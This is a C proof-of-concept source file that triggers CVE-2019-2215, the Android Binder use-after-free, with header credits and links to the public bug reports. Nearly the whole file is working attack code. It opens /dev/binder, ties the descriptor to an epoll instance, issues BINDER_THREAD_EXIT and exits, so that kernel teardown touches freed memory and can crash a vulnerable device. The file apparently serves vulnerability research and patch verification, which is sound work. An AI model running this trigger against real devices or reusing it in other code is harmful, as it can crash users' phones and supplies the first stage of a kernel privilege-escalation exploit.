/*++
## # # ### ### ### # ### ### ### # ###
# # # # # # # ## # # # # ## #
# # # ## ### ### # # # ### ### ### ### # ###
# # # # # # # # # # # # #
## # ### ### ### ### ### ### ### ### ###
@HackSysTeam
CVE-2019-2215
Android Binder Use after Free
CloudFuzz TechnoLabs Pvt. Ltd.
https://groups.google.com/d/msg/syzkaller-bugs/QyXdgUhAF50/g-FXVo1OAwAJ
https://bugs.chromium.org/p/project-zero/issues/detail?id=1942
https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html
Thanks:
@maddiestone
@tehjh
--*/
#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <stdio.h>
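/*
 * ioctl request number for BINDER_THREAD_EXIT, hard-coded so the PoC builds
 * without the binder UAPI header. Decoded: 0x40046208 = direction "write",
 * argument size 4, type 'b' (0x62), nr 8 -- i.e. _IOW('b', 8, <4-byte arg>).
 * The argument is passed as NULL below; the request is issued only for its
 * side effect on the calling thread's binder state.
 */
#define BINDER_THREAD_EXIT 0x40046208ul

/*
 * CVE-2019-2215 trigger (see the header comment for the references).
 *
 * The sequence, following the original "allocation / free / call" notes:
 *   1. open /dev/binder read-only;
 *   2. register that fd with an epoll instance (EPOLL_CTL_ADD) -- the
 *      "allocation" step;
 *   3. ioctl(BINDER_THREAD_EXIT) on the binder fd -- the "free" step;
 *   4. return from main, so process exit tears down the epoll registration
 *      that still refers to state released in step 3 -- the "call" step.
 *
 * Every syscall is checked: if the environment lacks /dev/binder, denies
 * access to it, or rejects the ioctl, the program reports the failing step
 * on stderr and exits with status 1 instead of silently "succeeding".
 * A clean exit with status 0 therefore means the full sequence was issued.
 * On a vulnerable kernel the process is not expected to return normally from
 * step 4 (per the referenced write-up the use-after-free is reached during
 * teardown); on a patched kernel it simply exits.
 *
 * Returns 0 when all four steps were issued, 1 when a step failed.
 */
int main(void) {
    /* Interest set for the registration; EPOLLIN is enough to create it. */
    struct epoll_event event = { .events = EPOLLIN };
    int fd, epfd;

    fd = open("/dev/binder", O_RDONLY);
    if (fd < 0) {
        perror("open(/dev/binder)");
        return 1;
    }

    /* The size argument is only a legacy hint; it must merely be positive. */
    epfd = epoll_create(1000);
    if (epfd < 0) {
        perror("epoll_create");
        return 1;
    }

    /* "allocation": tie the binder fd to the epoll instance. */
    if (epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event) < 0) {
        perror("epoll_ctl(EPOLL_CTL_ADD, /dev/binder)");
        return 1;
    }

    /* "free": tell binder this thread is done while epoll still refers to it. */
    if (ioctl(fd, BINDER_THREAD_EXIT, NULL) < 0) {
        perror("ioctl(BINDER_THREAD_EXIT)");
        return 1;
    }

    /*
     * "call": deliberately no close() here. The epoll registration is released
     * by the kernel when the process exits, and that teardown is the step the
     * PoC relies on. Announce it so a hang/crash right after this line is
     * attributable to the trigger rather than to the PoC itself.
     */
    fprintf(stderr, "trigger issued; exiting (vulnerable kernel may crash here)\n");
    return 0;
}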